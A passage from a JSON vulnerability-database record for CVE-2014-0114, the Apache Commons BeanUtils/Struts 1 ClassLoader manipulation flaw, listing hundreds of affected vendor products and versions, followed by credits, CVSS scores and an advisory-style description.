"vendor": "ibm", "version": "8.5" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.2" }, { "model": "websphere enterprise service bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "connections", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.0.2" }, { "model": "infosphere master data management collaborative edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-10.1" }, { "model": "utilities framework", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.0.2.0" }, { "model": "xp p9000 replication manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0.0-00" }, { "model": "retail invoice matching", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1" }, { "model": "connections", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.0.3" }, { "model": "connections", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.1" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "xp p9000 replication manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0.0-06" }, { "model": "omnifind enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "sitescope", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.10" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "tivoli integrated portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.114" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.1" }, { "model": "device manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.4.0-07" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "global link manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.1-00" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.5.0-02" }, { "model": "openpages grc platform", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-10-03" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "security identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.2-00" }, { "model": "device manager software (linux(suse", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-05" }, { "model": "security qradar", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "distributed marketing", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "sitescope monitors", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.20" }, { "model": "secure analytics", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.1" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "device manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-00" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "retail back office", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.2" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.52" }, { "model": "tiered storage manager software (linux(sles", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.4.0-07" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-00-02" }, { "model": "content manager records enabler", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "retail invoice matching 12.0in", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "knowledge", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.5.1" }, { "model": "infosphere master data management server for product information", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "device manager software (solaris", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.1-02(x64))" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "weblogic server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.1" }, { "model": "retail back office", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "14.1" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.1.0-00" }, { "model": "security qradar", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "rational insight ifix1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "tiered storage manager software (solaris(sp", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.1.0-00" }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "device manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-00" }, { "model": "jboss fuse", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.1.0" }, { "model": "distributed marketing", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "websphere partner gateway enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.53" }, { "model": "tiered storage manager software (solaris(sp", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-05" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.34" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "global link manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-00" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "utilities framework", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.0.1.0" }, { "model": "tiered storage manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-05" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.4" }, { "model": "distributed marketing", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "websphere enterprise service bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.001" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2143" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0" }, { "model": "sitescope", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.12" }, { "model": "tuning manager software )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.402" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-50" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "xp p9000 replication manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.6.1-06" }, { "model": "tivoli storage manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "tuning manager software )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0" }, { "model": "tiered storage manager software (solaris(x6", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-05" }, { "model": "real-time decision server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.7" }, { "model": "distributed marketing", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "retail invoice matching", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.0" }, { "model": "tuning manager software )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.1-00" }, { "model": "retail invoice matching", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "14.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.37" }, { "model": "tuning manager software (solaris(sp", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-05" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "openpages", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "tivoli dynamic workload console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "device manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.1.0-00" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "sitescope", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.21" }, { "model": "retail markdown optimization", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.4" }, { "model": "leads", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "sitescope", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "11.24.271" }, { "model": "lotus expeditor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "tiered storage manager software )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0-00" }, { "model": "tiered storage manager software (linux(suse", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-05" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.1" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-00" }, { "model": "tuning manager software )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.2-00" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.4.0-08" }, { "model": "retail central office", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.0" }, { "model": "tivoli provisioning manager for software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "global link manager software (linux(suse", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-00" }, { "model": "weblogic server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.3" }, { "model": "network satellite server (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6)5.6" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56002" }, { "model": "tiered storage manager software (solaris(sp", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.4.0-08" }, { "model": "content navigator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.2" }, { "model": "infosphere identity insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "retail invoice matching", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1" }, { "model": "raplication manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-05" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "76000" }, { "model": "tivoli netcool/omnibus web gui", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "device manager software (linux(sles", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.1.0-00" }, { "model": "retail clearance optimization engine", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.3" }, { "model": "retail central office", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.0" }, { "model": "connections", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "device manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.1.0-00" }, { "model": "security threat response manager 2012.1r7", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "global link manager software (linux(rhel", "scope": "ne", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-01" }, { "model": "security threat response manager", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2013.2" }, { "model": "device manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0.1-02" }, { "model": "retail invoice matching", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.0" }, { "model": "terasoluna server framework for java", "scope": "eq", "trust": 0.3, "vendor": "ntt data", "version": "2.01" }, { "model": "identity manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.21.0" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tiered storage manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.2.0-00" }, { "model": "device manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.3.1" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "tuning manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-05" }, { "model": "tiered storage manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0.0-00" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-0" }, { "model": "device manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.4-00" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "xp p9000 replication manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0.0-00" }, { "model": "connections", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.00" }, { "model": "sitescope", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "11.13" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "16.2" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.5.0" }, { "model": "device manager software (solaris(sp", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0.0-00" }, { "model": "connections", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.0.1" }, { "model": "enterprise data quality", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.1.2" }, { "model": "predictive insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "jdeveloper", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.20.0" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2.0" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "jdeveloper", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.30" }, { "model": "retail central office", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.3" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "insurance ifrs analyzer", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "178.0.6" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.22.0" }, { "model": "weblogic server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.3.0" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.2" }, { "model": "retail returns management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.2" }, { "model": "tuning manager software (solaris(sp", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.4.0-03" }, { "model": "websphere service registry and repository", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-50-09" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "device manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.4.0-08" }, { "model": "tuning manager software )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0" }, { "model": "retail allocation", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.0" }, { "model": "retail central office 12.0.9in", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "utilities framework", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.0.2.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77000" }, { "model": "communications webrtc session controller", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.1" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "global link manager software (solaris(sp", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-01" }, { "model": "websphere partner gateway express edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "global link manager software (linux(suse", "scope": "ne", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-01" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-10" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.145" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.010" }, { "model": "raplication manager software (linux(rhel", "scope": "ne", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-06" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "weblogic server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.0.2" }, { "model": "raplication manager software (solaris(sp", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-05" }, { "model": "device manager software (linux(sles", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.4.0-08" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.13" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "retail central office", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1" }, { "model": "communications webrtc session controller", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.2" }, { "model": "device manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.4.0-08" }, { "model": "retail markdown optimization", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.2" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.1" }, { "model": "infosphere mashuphub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "vcenter server update", "scope": "ne", "trust": 0.3, "vendor": "vmware", "version": "5.52" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.021" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "device manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.6.1-06" }, { "model": "retail allocation", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "contact optimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0.1-02" }, { "model": "device manager software (solaris", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.1.1-00(x64))" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-00" }, { "model": "manager", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "111.7" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-00-01" }, { "model": "websphere enterprise service bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "tuning manager software (solaris(sp", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.4.0-02" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "global link manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-01" }, { "model": "device manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.2.1-00" }, { "model": "big-ip edge gateway hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "device manager software (linux(sles", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.3.0-00" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "device manager software (solaris", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.2-00(x64))" }, { "model": "big-ip edge gateway hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "web interface for content management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.4" }, { "model": "device manager software )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.1-03" }, { "model": "weblogic server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.20" }, { "model": "tuning manager software (solaris(sp", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.4.0-01" }, { "model": "weblogic server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.3.60" }, { "model": "lotus quickr for websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-00-02" }, { "model": "retail allocation", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1" }, { "model": "tiered storage manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.4.0-07" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.4" }, { "model": "tivoli integrated portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "contact optimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" } ], "sources": [ { "db": "BID", "id": "67121" }, { "db": "CNNVD", "id": "CNNVD-201404-581" }, { "db": "NVD", "id": "CVE-2014-0114" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Rene Gielen", "sources": [ { "db": "BID", "id": "67121" }, { "db": "PACKETSTORM", "id": "126455" }, { "db": "CNNVD", "id": "CNNVD-201404-581" } ], "trust": 1.0 }, "cve": "CVE-2014-0114", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2014-0114", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.1, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0114", "trust": 1.0, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201404-581", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2014-0114", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0114" }, { "db": "CNNVD", "id": "CNNVD-201404-581" }, { "db": "NVD", "id": "CVE-2014-0114" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1. Apache Struts is prone to a security-bypass vulnerability because it fails to adequately handle user-supplied input. \nAn attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. \nApache Struts versions 1.0.0 through 1.3.10 are vulnerable. \n\nSecurity Fix(es):\n\n* Apache Struts 1: Class Loader manipulation via request parameters\n(CVE-2014-0114)\n\n* thrift: Improper file path sanitization in\nt_go_generator.cc:format_go_output() of the go client library can allow an\nattacker to inject commands (CVE-2016-5397)\n\n* slf4j: Deserialisation vulnerability in EventData constructor can allow\nfor arbitrary code execution (CVE-2018-8088)\n\n* jolokia: JMX proxy mode vulnerable to remote code execution\n(CVE-2018-1000130)\n\n* 